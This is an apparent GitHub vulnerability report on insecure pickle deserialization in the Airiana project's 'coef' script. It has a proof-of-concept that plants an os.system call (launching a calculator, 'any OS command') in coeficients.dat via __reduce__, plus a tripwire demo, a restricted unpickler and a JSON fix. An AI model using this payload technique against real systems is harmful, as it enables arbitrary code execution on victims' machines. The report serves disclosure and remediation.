
Insecure Deserialization via pickle.load() in coef Leads to Remote Code Execution (RCE)

Open mohit121312 opened this issue 8 months ago • 0 comments

Describe the bug

The coef script is vulnerable to insecure deserialization, leading to remote code execution (RCE). The script loads data from coeficients.dat using Python's pickle.load() without validating the contents, allowing an attacker to execute arbitrary code by replacing the .dat file with a malicious payload.

Vulnerable Code

https://github.com/BeamCtrl/Airiana/blob/ed778d6d8adc9b0fb86ccc5a9db9e23e6d996664/coef#L6-L7

To Reproduce

Steps to reproduce the behavior:

  1. Clone the repository:

git clone https://github.com/BeamCtrl/Airiana

  2. Navigate to the coef directory:

cd Airiana

  3. Create the malicious coeficients.dat file using the following Python script:
import pickle
import os

class Evil:
    def __reduce__(self):
        return (os.system, ("gnome-calculator",))  # Replace with any OS command

payload = pickle.dumps(Evil())

with open("coeficients.dat", "wb") as f:
    f.write(payload)

This generates the following data inside coeficients.dat:

[Image: contents of the generated coeficients.dat]

  4. Run the vulnerable script:

python3 coef

  5. Observe: the calculator, or any other arbitrary system command, is executed.

https://github.com/user-attachments/assets/f9701c40-73d9-4a8e-bbe9-8fd2af71f71c

mohit121312 · May 04 '25 07:05
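The following is an added example, not code from the Airiana project or from the reporter. It reproduces the attack pattern above with a side-effect-free tripwire in place of os.system, then shows the minimal hardening for code that must keep reading pickle files: a pickle.Unpickler subclass whose find_class refuses every global, so only literal data (numbers, strings, lists, dicts, and so on) can be deserialized and a `__reduce__` payload is rejected before any callable runs. The coefficient data shape (a dict of str to float) is an assumption for the sample; the real file format is not shown on the page.

```python
import io
import pickle

# Tripwire standing in for os.system: it records that it was invoked instead
# of running a command, so the demonstration has no side effects on the host.
EXECUTED = []


def tripwire(tag):
    EXECUTED.append(tag)
    return tag


class Evil:
    # Same construction as the report's payload: on unpickling, pickle calls
    # tripwire("payload ran") exactly as it would call os.system("...").
    def __reduce__(self):
        return (tripwire, ("payload ran",))


def make_malicious_payload():
    return pickle.dumps(Evil())


def make_legit_payload():
    # Constructed sample coefficients (assumed shape, not the project's real file).
    return pickle.dumps({"a0": 1.5, "a1": -0.25, "a2": 3.0})


def unsafe_load(data):
    # The vulnerable pattern from the report: whatever callable the pickle
    # names via __reduce__ is imported and executed during load.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that forbids resolving any global (class, function, builtin)."""

    def find_class(self, module, name):
        # Every GLOBAL/STACK_GLOBAL opcode routes through here; refusing them all
        # means only plain data structures can come out of the stream.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_load(data):
    """Return ("ok", value) for plain data, ("rejected", reason) for payloads."""
    try:
        return ("ok", safe_load(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print("unsafe:", unsafe_load(make_malicious_payload()), "executed:", EXECUTED)
    print("legit via safe_load:", try_safe_load(make_legit_payload()))
    print("malicious via safe_load:", try_safe_load(make_malicious_payload()))
```

For a file that only ever holds numeric coefficients, the better fix is to drop pickle altogether and store the values as JSON (or another data-only format), since json.load cannot instantiate objects or call functions at all; the restricted unpickler above is the fallback when existing pickle files must remain readable.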